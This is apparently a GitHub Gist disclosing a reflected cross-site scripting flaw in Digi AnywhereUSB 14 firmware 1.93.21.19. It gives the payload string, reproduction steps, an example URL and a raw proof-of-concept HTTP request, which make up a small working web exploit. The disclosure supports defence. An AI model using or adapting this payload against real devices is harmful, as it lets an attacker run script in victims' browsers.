Created
January 9, 2020 08:18
-
-
Save RNPG/e0d25ad51aa5c288b9005900f88a4f03 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Vulnerability Type: Cross Site Scripting (XSS) Vulnerability | |
| Vendor of Product: Digi International | |
| Affected Product Code Base: AnywhereUSB - 14 | |
| Firmware Version: 1.93.21.19 | |
| Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page. | |
| Attack Vectors: Someone must open a link for the Digi Page | |
| Attack Type: Remote | |
| Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| Steps To Reproduce | |
| 1. Browse the Web Page of the Digi’s AnywhereUSB and trying not to log in | |
| 2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim | |
| Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| #PoC | |
| GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1 | |
| Host: Target IP | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment